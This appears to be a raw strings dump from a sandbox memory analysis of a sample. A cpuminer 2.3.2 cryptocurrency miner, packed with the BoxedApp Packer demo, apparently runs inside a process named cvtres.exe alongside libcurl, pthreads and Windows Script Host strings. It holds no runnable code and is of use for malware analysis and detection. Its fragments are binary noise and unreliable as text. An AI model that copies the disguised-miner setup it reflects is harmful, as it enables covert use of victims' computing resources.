_Curl_do
curl_fnmatch.c
ftplistparser.c
http_chunks.c
http_digest.c
curl_rand.c
http_negotiate.c
tftp.c
ssh.c
curl_addrinfo.c
curl_sspi.c
curl_memrchr.c
smtp.c
curl_threads.c
curl_rtmp.c
curl_gethostname.c
http_proxy.c
curl_gssapi.c
curl_ntlm.c
curl_ntlm_wb.c
curl_ntlm_core.c
curl_ntlm_msgs.c
curl_sasl.c
curl_schannel.c
curl_multibyte.c
curl_darwinssl.c
pipeline.c
.idata$7
.idata$5
.idata$48
.idata$6
.idata$4(
.idata$4,
.idata$44
.idata$40
.idata$4
.idata$7`
.idata$7\
.idata$7l
.idata$4
.idata$7x
.idata$6|
.idata$6T
.idata$7|
.idata$7d
.idata$7t
.idata$6d
.idata$6D
.idata$64
.idata$7h
.idata$7p
.idata$6l
.idata$6$
.idata$2P
.idata$5|
.idata$4$
.idata$6(
.idata$6P
.idata$60
.idata$68
.idata$2(
.idata$4`
.idata$6h
.idata$4L
.idata$6\
.idata$5@
.idata$7(
.idata$5P
.idata$7H
.idata$5p
.idata$6t
.idata$7D
.idata$5l
.idata$5<
.idata$4@
.idata$4H
.idata$6,
.idata$5
.idata$4l
.idata$4T
.idata$7<
.idata$5d
.idata$74
.idata$5\
.idata$6<
.idata$4<
.idata$5D
.idata$7,
.idata$5T
.idata$5,
.idata$4x
.idata$5$
.idata$4p
.idata$78
.idata$5`
.idata$6H
.idata$4h
.idata$5(
.idata$4t
.idata$7
.idata$5H
.idata$7@
.idata$5h
.idata$6`
.idata$70
.idata$5X
.idata$4X
.idata$58
.idata$4D
.idata$4P
.idata$50
.idata$4|
.idata$7$
.idata$5L
.idata$4\
.idata$4d
.idata$7L
.idata$5t
.idata$54
.idata$2<
.idata$5x
.idata$7P
.idata$6p
.idata$7T
.idata$2
.idata$7X
.idata$6X
.idata$6
.idata$2d
.debug_aranges
.debug_pubnames
.debug_info
.debug_abbrev
.debug_line
.debug_frame
.debug_loc
_DllMainCRTStartup@12
_curlx_tvdiff
_curlx_tvdiff_secs
_Curl_tvlong
_curlx_tvnow
_Curl_base64_encode
_Curl_base64_decode
_Curl_num_addresses
_Curl_resolv_unlock
_Curl_hostcache_clean
_Curl_hostcache_destroy
_Curl_mk_dnscache
_Curl_hostcache_prune
_Curl_cache_addr
_Curl_loadhostpairs
_Curl_resolv
_Curl_resolv_timeout
_Curl_printable_address
_Curl_global_host_cache_dtor
_Curl_global_host_cache_init
_Curl_pgrsSetDownloadCounter
_Curl_pgrsSetUploadCounter
_Curl_pgrsSetDownloadSize
_Curl_pgrsSetUploadSize
_Curl_pgrsResetTimesSizes
_Curl_pgrsStartNow
_Curl_pgrsUpdate
_Curl_pgrsDone
_Curl_pgrsTime
_Curl_formclean
_curl_formfree
_Curl_FormInit
_Curl_formpostheader
_Curl_FormReader
_Curl_getformdata
_curl_formget
_curl_formadd
_Curl_cookie_freelist
_Curl_cookie_clearall
_Curl_cookie_clearsess
_Curl_cookie_cleanup
_Curl_cookie_list
_Curl_cookie_getlist
_Curl_cookie_add
_Curl_cookie_init
_Curl_cookie_loadfiles
_Curl_flush_cookies
_http_should_fail
_Curl_add_buffer_init
_http_getsock_do
_use_http_1_1
_Curl_add_buffer
_checkhttpprefix
_Curl_checkheaders
_Curl_compareheader
_http_perhapsrewind
_Curl_http_auth_act
_Curl_http_done
_Curl_http_connect
_Curl_add_bufferf
_Curl_add_timecondition
_Curl_add_custom_headers
_Curl_add_buffer_send
_Curl_http_input_auth
_Curl_http_output_auth
_Curl_http
_Curl_http_readwrite_headers
_Curl_write
_Curl_debug
_Curl_read
_Curl_read_plain
_Curl_sendf
_Curl_failf
_Curl_client_write
_Curl_recv_plain
_Curl_send_plain
_Curl_write_plain
_Curl_infof
_Curl_freeset
_Curl_init_userdefined
_Curl_protocol_getsock
_Curl_doing_getsock
_Curl_protocol_connecting
_Curl_protocol_doing
_Curl_reset_reqproto
_Curl_do_more
_Curl_verboseconnect
_Curl_isPipeliningEnabled
_IsPipeliningPossible
_parse_remote_port
_Curl_open
_Curl_protocol_connect
_Curl_connected_proxy
_Curl_setup_conn
_Curl_removeHandleFromPipeline
_Curl_getoff_all_pipelines
_Curl_addHandleToPipeline
_signalPipeClose
_Curl_disconnect
_Curl_done
_Curl_handler_dummy
_Curl_connect
_Curl_setopt
_Curl_close
_Curl_dupset
_Curl_if_is_interface_name
_Curl_if2ip
_Curl_speedcheck
_Curl_speedinit
_curl_version_info
_curl_version
_curl_getenv
_curl_free
_Curl_urldecode
_curl_easy_unescape
_curl_unescape
_curl_easy_escape
_curl_escape
_curl_msnprintf
_curl_mvfprintf
_curl_mvprintf
_curl_mvsprintf
_curl_mfprintf
_curl_mprintf
_curl_msprintf
_curl_mvaprintf
_curl_maprintf
_curl_mvsnprintf
_Curl_parsenetrc
_Curl_initinfo
_Curl_getinfo
_Curl_single_getsock
_Curl_sleep_time
_Curl_posttransfer
_strlen_url
_strcpy_url
_Curl_setup_transfer
_Curl_meets_timecondition
_Curl_reconnect_request
_Curl_follow
_Curl_pretransfer
_Curl_readrewind
_Curl_retry_request
_Curl_fillreadbuffer
_Curl_readwrite
_curl_strnequal
_curl_strequal
_Curl_easy_addmulti
_curl_easy_send
_curl_easy_recv
_curl_easy_pause
_Curl_easy_initHandleData
_curl_easy_reset
_curl_easy_duphandle
_curl_easy_getinfo
_curl_easy_cleanup
_curl_easy_perform
_curl_easy_setopt
_curl_global_cleanup
_curl_global_init
_curl_easy_init
_curl_global_init_mem
_Curl_fnmatch
_Curl_fileinfo_dtor
_Curl_fileinfo_alloc
_Curl_wildcard_dtor
_Curl_wildcard_init
_Curl_httpchunk_init
_Curl_httpchunk_read
_Curl_strtok_r
_Curl_persistconninfo
_Curl_socket
_Curl_closesocket
_Curl_getconnectinfo
_Curl_timeleft
_Curl_sndbufset
_Curl_connecthost
_Curl_updateconninfo
_Curl_is_connected
_Curl_llist_alloc
_Curl_llist_insert_next
_Curl_llist_remove
_Curl_llist_destroy
_Curl_llist_count
_Curl_llist_move
_Curl_hash_pick
_Curl_hash_str
_Curl_hash_start_iterate
_Curl_hash_next_element
_Curl_str_key_compare
_Curl_hash_clean_with_criterium
_Curl_hash_delete
_Curl_hash_clean
_Curl_hash_destroy
_Curl_hash_add
_Curl_hash_init
_Curl_hash_alloc
_fd_key_compare
_multi_freeamsg
_Curl_multi_pipeline_enabled
_Curl_multi_handlePipeBreak
_Curl_multi_set_easy_connection
_Curl_multi_max_host_connections
_Curl_multi_max_total_connections
_Curl_multi_max_pipeline_length
_Curl_multi_content_length_penalty_size
_Curl_multi_chunk_length_penalty_size
_Curl_multi_pipelining_site_bl
_Curl_multi_pipelining_server_bl
_curl_multi_assign
_Curl_expire
_Curl_multi_process_pending_handles
_curl_multi_timeout
_curl_multi_fdset
_curl_multi_setopt
_curl_multi_info_read
_curl_multi_cleanup
_curl_multi_perform
_curl_multi_socket_all
_curl_multi_socket_action
_curl_multi_socket
_curl_multi_wait
_curl_multi_remove_handle
_curl_multi_add_handle
_curl_multi_init
_Curl_unencode_cleanup
_Curl_unencode_gzip_write
_Curl_unencode_deflate_write
_curl_share_init
_Curl_share_lock
_Curl_share_unlock
_curl_share_cleanup
_curl_share_setopt
_Curl_digest_cleanup
_Curl_output_digest
_Curl_input_digest
_Curl_MD5_init
_Curl_MD5_update
_Curl_MD5_final
_Curl_md5it
_Curl_rand
_Curl_srand
_Curl_inet_pton
_curl_easy_strerror
_curl_multi_strerror
_curl_share_strerror
_Curl_strerror
_Curl_ipvalid
_Curl_ipv4_resolve_r
_Curl_getaddrinfo
_Curl_set_dns_servers
_Curl_inet_ntop
_Curl_gmtime
_curl_getdate
_Curl_wait_ms
_Curl_poll
_Curl_socket_check
_Curl_clone_ssl_config
_Curl_free_ssl_config
_Curl_ssl_config_matches
_Curl_splay
_Curl_splayinsert
_KEY_NOTUSED.17658
_Curl_splaygetbest
_Curl_splayremovebyaddr
_Curl_blockread_all
_Curl_SOCKS5
_Curl_SOCKS4
_Curl_raw_toupper
_Curl_raw_equal
_Curl_raw_nequal
_Curl_strntoupper
_Curl_freeaddrinfo
_Curl_he2ai
_Curl_ip2addr
_Curl_str2addr
_curl_slist_append
_curl_slist_free_all
_Curl_slist_duplicate
_curlx_nonblock
_Curl_memrchr
_curlx_ultous
_curlx_ultouc
_curlx_ultosi
_curlx_uztosi
_curlx_uztoul
_curlx_uztoui
_curlx_sltosi
_curlx_sltoui
_curlx_sltous
_curlx_uztosz
_curlx_sotouz
_curlx_sztosi
_curlx_sitouz
_curlx_sktosi
_curlx_sitosk
_Curl_HMAC_init
_Curl_HMAC_update
_Curl_HMAC_final
_Curl_gethostname
http_negotiate_sspi.c
_Curl_proxyCONNECT
_Curl_proxy_connect
_Curl_sasl_cleanup
_Curl_sasl_create_login_message
_sasl_digest_get_key_value
_Curl_sasl_create_digest_md5_message
_Curl_sasl_create_cram_md5_message
_Curl_sasl_create_plain_message
_Curl_bundle_remove_conn
_Curl_bundle_add_conn
_Curl_bundle_destroy
_Curl_bundle_create
_Curl_conncache_find_first_connection
_Curl_conncache_foreach
_Curl_conncache_remove_conn
_Curl_conncache_find_bundle
_Curl_conncache_add_conn
_Curl_conncache_destroy
_Curl_conncache_init
_print_pipeline
_Curl_pipeline_set_server_blacklist
_Curl_pipeline_server_blacklisted
_Curl_pipeline_set_site_blacklist
_Curl_pipeline_site_blacklisted
_Curl_move_handle_from_send_to_recv_pipe
_Curl_add_handle_to_pipeline
_Curl_pipeline_penalized
.weak.__Jv_RegisterClasses.___gcc_register_frame
__libmsvcrt_a_iname
_Curl_handler_http
___crt_xl_start__
___crt_xi_start__
___crt_xi_end__
_Curl_crealloc
_Curl_cfree
_Curl_HMAC_MD5
_Curl_wkday
___crt_xp_start__
_Curl_handler_file
___crt_xp_end__
__head_libmsvcrt_a
_Curl_ccalloc
___crt_xc_end__
___crt_xc_start__
_Curl_DIGEST_MD5
_Curl_cmalloc
_Curl_month
_Curl_cstrdup
___crt_xt_start__
_Curl_cwcsdup
___crt_xt_end__
_Curl_ack_eintr
0`.data
[email protected]
%XQIb
%dQIb
%DQIb
%xQIb
libgcc_s_dw2-1.dll
\QUSEREX.DLL
pthread_key_create
pthread_key_delete
7(8.898?8
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
__mingwthr_key_t
__mingwthr_key
GNU C 4.5.2
../mingw/dllcrt1.c
C:\MinGW\msys\1.0\src\mingwrt
-DllMainCRTStartup@12
__report_error
../mingw/crtst.c
__mingwthr_run_key_dtors
keyp
new_key
prev_key
cur_key
key_dtor_list
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
cygming-crtbegin.c
.tls$AAA
.tls$ZZZ
.CRT$XLA
.CRT$XLZ
.CRT$XLC
.CRT$XLD
.CRT$XDA
.CRT$XDZ
.idata$6N
.idata$6j
.idata$62
.idata$6V
.idata$6~
.idata$6*
.idata$6f
.idata$6@
.idata$6>
cygming-crtend.c
__CRT_MT
.eh_frame
.debug_pubtypes
.debug_str
.debug_ranges
_pthread_key_create
_pthread_key_delete
_ptw32_processTerminate.part.1
_pthread_join
___report_error
___mingwthr_run_key_dtors
_key_dtor_list
____w64_mingwthr_add_key_dtor
____w64_mingwthr_remove_key_dtor
.text.startup
.ctors.65535
.weak.___register_frame_info.___gcc_register_frame
_ptw32_selfThreadKey
_ptw32_cleanupKey
.weak.___deregister_frame_info.___gcc_register_frame
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
b
inflate 1.2.8 Copyright 1995-2013 Mark Adler
%9X9i9z9
"@"@"@"@
This EXE is created by the demo version of BoxedApp Packer
Visit our web-site at: http://boxedapp.com/boxedapppacker/order.html
WBoxedAppLog_%d.txt
BoxedAppVar:ExeFileName
BoxedAppVar:ExeFileExtension
BoxedAppVar:ExeFileNameWithoutExtension
BoxedAppVar:ExeFullPath
BoxedAppVar:OldCmdLine
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_CURRENT_CONFIG
HKEY_USERS
%s\%s
%s\winsxs\tempBxDir\virtualAsm
:\tempManifest.manifest
%s_%.8x_%.8x_%.8x
\KernelBase.dll
\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
%d-%d-%p
:\TLSSupport310D39B571B74d36B95451DD240D8758
",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
\rundll32.exe"
DotNetAppDomainManager.CManagedHost
BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1
DotNetAppDomainManager.CAppDomainManager
.config
.manifest
",BoxedAppSDK_AttachMixedBitnessProcessHelper
Attempt to launch not executable file:
Unable to find appropriate template exe
comdlg32.dll
\dllhost.exe
hh.exe
find.exe
help.exe
winver.exe
regsvr32.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
mpr.dll
Wadvapi32.dll
sxs.dll
Obtain a full version, purchase a license at http://boxedapp.com/boxedappsdk/order.html
%s_%.8x_%.8x
%s_%.8x
boxedapp_msg_process
boxedapp_event_newmsg
boxedapp_msg_global
bxsdk64.dll
:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\
\DosDevices\pipe\
\Device\NamedPipe\
\??\pipe\
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates
\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates
publicKeyToken
Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\
!"#$%&'()* ,-./0123456789:;<=>?@
3, 3, 5, 0
BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.
BoxedAppSDK.dll
\libcurl-4.dll
!"#$%&'()* ,-./0123456789:
pthreadgc2.dll
\pthreadgc2.dll
POSIX Threads for Windows LPGL
2, 9, 1, 0
pthreadGC2.DLL
http://sourceware.org/pthreads-win32/
\zlib1.dll
For more information visit http://www.zlib.net/

nt32.exe_1560_rwx_00CE0000_00010000:




u.iD$

WScript.exe_1736:




.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
msvcrt.dll
OLEAUT32.dll
ole32.dll
VERSION.dll
wscript.exe
advapi32.dll
kernel32.dll
%s%s.DLL
wintrust.dll
%d.%d
Invalid parameter passed to C runtime function.
SOFTWARE\Classes\%s\%s
0x%8X
CreateURLMonikerEx
urlmon.dll
@@8X%u
RegCreateKeyA
RegCloseKey
RegOpenKeyA
RegDeleteKeyA
RegCreateKeyExW
RegCreateKeyExA
RegOpenKeyExW
ReportEventW
RegEnumKeyExA
RegOpenKeyExA
GetProcessHeap
GetCPInfo
MsgWaitForMultipleObjects
EnumThreadWindows
wscript.pdb
stdole2.tlbWWW
.ObjectWW
KeyW
WindowsFolderWWW4
%CopyFolderWWL
Windows Script Host (Ver 5.6)W)
Windows Script Host Application InterfaceW%
Windows Script Host Object
ebstrCmdLineW
78t8x8
5Q5F5
Software\Microsoft\Windows Script Host\Settings
Windows Script Host
WScript.CreateObject
WSHRemote.Execute
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
Microsoft (R) Windows Based Script Host
5.7.0.16599
Microsoft (R) Windows Script Host
(Windows Script Host (debugging disabled)
Windows Script Host Error
Windows Script Host Input Error
This Unicode version of Windows Script Host will only execute under Windows NT.
Please use the ANSI version of Windows Script Host."
WScript execution time was exceeded on script "%1!ls!".
Script execution was terminated.1Could not locate automation class named "%1!ls!".
Could not connect object.'Could not create object named "%1!ls!".1Initialization of the Windows Script Host failed.6Can't find script engine "%2!ls!" for script "%1!ls!".!Can't change default script host.=An attempt at saving your settings via the //S option failed.(Loading script "%1!ls!" failed (%2!ls!).
Loading your settings failed.,Execution of the Windows Script Host failed.,Unexpected error of the Windows Script Host._Windows Script Host access is disabled on this machine. Contact your administrator for details.
Missing job name.*Unicode is not supported on this platform.
Command line options are saved.4The default script host is now set to "wscript.exe".4The default script host is now set to "cscript.exe".,Successful execution of Windows Script Host.3Successful remote execution of Windows Script Host.
Win32 Error 0x%X
Windows Script Host(Windows Script Host (debugging disabled)
Usage: WScript scriptname.extension [option...] [arguments...]
Use engine for executing script
Changes the default script host to CScript.exe
Changes the default script host to WScript.exe (default)
Prevent logo display: No banner will be shown at execution time
#WScript Error - Windows Script Host!Input Error - Windows Script HostlThis Unicode version of WScript will only execute under Windows NT.
%6!ls! WScript - Script Execution Error!Windows Script Host Remote Script/Remote script object can only be executed once. Unable to execute remote script.

nt32.exe_1560_rwx_675A6000_00003000:




.Qg<-Qg
*Rg`.Rg|)RgL Rg

cvtres.exe_432_rwx_00400000_00177000:




.text
``.data
.rdata
`@.bss
.idata
.main
.bxpck
66665\\\\
\\\\5\\\\
666656666
libgcj-12.dll
JSON decode of %s failed
http://
https://
stratum tcp://
http://%s
cpuminer 2.3.2
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text   lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
mingwm10.dll
__mingwthr_remove_key_dtor
__mingwthr_key_dtor
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
0123456789
curl_easy_cleanup
curl_easy_init
curl_easy_perform
curl_easy_reset
curl_easy_setopt
curl_global_init
curl_slist_append
curl_slist_free_all
curl_version
pthread_join
libcurl-4.dll
KERNEL32.dll
msvcrt.dll
pthreadGC2.dll
WS2_32.dll
zcÁ
KERNEL32.DLL
USER32.DLL
EnumChildWindows
kernel32.dll
ntdll.dll
mscoree.dll
.mixcrt
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
operator
USER32.dll
SHELL32.dll
OLEAUT32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
EXEPackerHost32.exe
?m_IID@@3RCU_IMAGE_IMPORT_DESCRIPTOR@@C
`.rdata
@.data
.rsrc
@.reloc
.\BoxedAppSDK_StaticLib.cpp
BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
BoxedAppSDK_AttachMixedBitnessProcessHelper
BoxedAppSDK_EnumVirtualRegKeysA
BoxedAppSDK_EnumVirtualRegKeysW
BoxedAppSDK_ExecuteDotNetApplicationA
BoxedAppSDK_ExecuteDotNetApplicationW
BoxedAppSDK_DeleteVirtualRegKeyByHandle
BoxedAppSDK_DeleteVirtualRegKeyW
BoxedAppSDK_DeleteVirtualRegKeyA
BoxedAppSDK_CreateVirtualRegKeyW
BoxedAppSDK_CreateVirtualRegKeyA
C62E2B35-E4B3-4019-A7C4-F50AC7F78470
Get exe dir...
Get exe dir...done
Get the extension...done
Get current dir...done
Get old args...done
The command line overriding: %s
GetCommandLineW preparing to intercept...done
GetCommandLineA preparing to intercept...done
The embedding BoxedApp into child processes: %s
GetWindowsDirectoryW
RegCreateKeyExW
RegDeleteKeyW
RegCloseKey
ADVAPI32.dll
ole32.dll
EXEPackerStub32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\exepackerstub\!output\exepackerstub32\release_full\EXEPackerStub32.pdb
l$D9.tO
FTPSW
u$D
TryCreateProcessForVirtualEXE, template exe found:
CBoxedAppCore::My_NtDeleteKey, KeyHandle = 0x
CBoxedAppCore::My_NtEnumerateValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtFlushKey, KeyHandle = 0x
CBoxedAppCore::My_NtNotifyChangeKey, KeyHandle = 0x
CBoxedAppCore::My_NtQueryKey, KeyHandle =
CBoxedAppCore::My_NtQueryMultipleValueKey, KeyHandle =
CBoxedAppCore::My_NtSetInformationKey, KeyHandle = 0x
KernelBase.dll
0x%x%x
CBoxedAppCore::My_NtCreateKey, ObjectAttributes = '
CBoxedAppCore::My_NtDeleteValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtLoadKey, DestinationKeyName = '
CBoxedAppCore::My_NtQueryValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtReplaceKey, BackupHiveFileName = '
CBoxedAppCore::My_NtSetValueKey, KeyHandle = 0x
CBoxedAppCore::My_NtUnloadKey, DestinationKeyName = '
CBoxedAppCore::My_NtRenameKey, KeyHandle =
BoxedAppSDK::CBoxedAppCore::TryCreateProcessForVirtualEXE_AnotherBitnessPart
: Can't create process of rundll32.exe, last error =
{4F95F74C-9713-4181-ACDD-8A50195FBC0F}
BoxedAppSDK::CBoxedAppCore::AttachToProcess_WithProcessHelper
BoxedAppSDK::CBoxedAppCore::AttachMixedBitnessProcessHelper
CBoxedAppCore::My_NtLoadKey2, DestinationKeyName = '
CBoxedAppCore::My_NtRestoreKey, KeyHandle = 0x
CBoxedAppCore::My_NtSaveKey, KeyHandle = 0x
:\VirtualDllWithSameImport.dll
:\VirtualDllWithTls.dll
VirtualDllWithTls.dll
VirtualDllWithSameImport.dll
WinExec
advapi32.dll
NtRenameKey
NtUnloadKey
NtSetValueKey
NtSetInformationKey
NtSaveKey
NtRestoreKey
NtReplaceKey
NtQueryValueKey
NtQueryMultipleValueKey
NtQueryKey
NtOpenKeyEx
NtOpenKey
NtNotifyChangeKey
NtLoadKey2
NtLoadKey
NtFlushKey
NtEnumerateValueKey
NtEnumerateKey
NtDeleteValueKey
NtDeleteKey
NtCreateKey
[BOXEDAPP][pid:%d][tid:%d][ %.2d:%.2d:%.2d.%.3d]
FILE_EXECUTE
GENERIC_EXECUTE
KEY_WOW64_64KEY
KEY_WOW64_32KEY
KEY_NOTIFY
KEY_CREATE_LINK
KEY_ENUMERATE_SUB_KEYS
KEY_CREATE_SUB_KEY
KEY_SET_VALUE
KEY_QUERY_VALUE
SECTION_MAP_EXECUTE
PAGE_EXECUTE_WRITECOPY
PAGE_EXECUTE_READWRITE
PAGE_EXECUTE_READ
PAGE_EXECUTE
STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED
STATUS_LOCAL_USER_SESSION_KEY
STATUS_NULL_LM_PASSWORD
STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE
STATUS_CARDBUS_NOT_SUPPORTED
STATUS_INVALID_PORT_ATTRIBUTES
STATUS_PORT_MESSAGE_TOO_LONG
STATUS_PORT_DISCONNECTED
STATUS_PORT_CONNECTION_REFUSED
STATUS_INVALID_PORT_HANDLE
STATUS_PORT_ALREADY_SET
STATUS_EAS_NOT_SUPPORTED
STATUS_CTL_FILE_NOT_SUPPORTED
STATUS_WRONG_PASSWORD
STATUS_ILL_FORMED_PASSWORD
STATUS_PASSWORD_RESTRICTION
STATUS_PASSWORD_EXPIRED
STATUS_FLOAT_DENORMAL_OPERAND
STATUS_FLOAT_INVALID_OPERATION
STATUS_PIPE_NOT_AVAILABLE
STATUS_INVALID_PIPE_STATE
STATUS_PIPE_BUSY
STATUS_PIPE_DISCONNECTED
STATUS_PIPE_CLOSING
STATUS_PIPE_CONNECTED
STATUS_PIPE_LISTENING
STATUS_NOT_SUPPORTED
STATUS_PIPE_EMPTY
STATUS_WRONG_PASSWORD_CORE
STATUS_PIPE_BROKEN
STATUS_DISK_OPERATION_FAILED
STATUS_KEY_DELETED
STATUS_KEY_HAS_CHILDREN
STATUS_NO_USER_SESSION_KEY
STATUS_PASSWORD_MUST_CHANGE
STATUS_PORT_UNREACHABLE
STATUS_LOGIN_TIME_RESTRICTION
STATUS_LOGIN_WKSTA_RESTRICTION
STATUS_UNSUPPORTED_COMPRESSION
STATUS_NO_USER_KEYS
STATUS_NOT_EXPORT_FORMAT
STATUS_TRANSPORT_FULL
STATUS_WMI_NOT_SUPPORTED
STATUS_SAM_NEED_BOOTKEY_PASSWORD
STATUS_SAM_NEED_BOOTKEY_FLOPPY
STATUS_STRONG_CRYPTO_NOT_SUPPORTED
STATUS_NOT_SUPPORTED_ON_SBS
STATUS_CSS_KEY_NOT_PRESENT
STATUS_CSS_KEY_NOT_ESTABLISHED
STATUS_NO_KERB_KEY
STATUS_UNSUPPORTED_PREAUTH
STATUS_PORT_NOT_SET
STATUS_INVALID_IMPORT_OF_NON_DLL
STATUS_SMARTCARD_NO_KEY_CONTAINER
STATUS_SMARTCARD_NO_CERTIFICATE
STATUS_SMARTCARD_NO_KEYSET
STATUS_SMARTCARD_CERT_REVOKED
STATUS_SMARTCARD_CERT_EXPIRED
STATUS_SXS_KEY_NOT_FOUND
STATUS_CLUSTER_JOIN_IN_PROGRESS
STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS
RegDeleteKeyExW
NtRequestWaitReplyPort
NtConnectPort
NtReplyPort
NtCompleteConnectPort
NtAcceptConnectPort
NtReplyWaitReceivePort
NtCreateWaitablePort
Imported function,
.data
It's impossible to create virtual file: parent file is virtual, but passed pBehavior is not NULL
It's impossible to create virtual file: passed pBehavior doesn't support Behavior::IVirtualFileStream
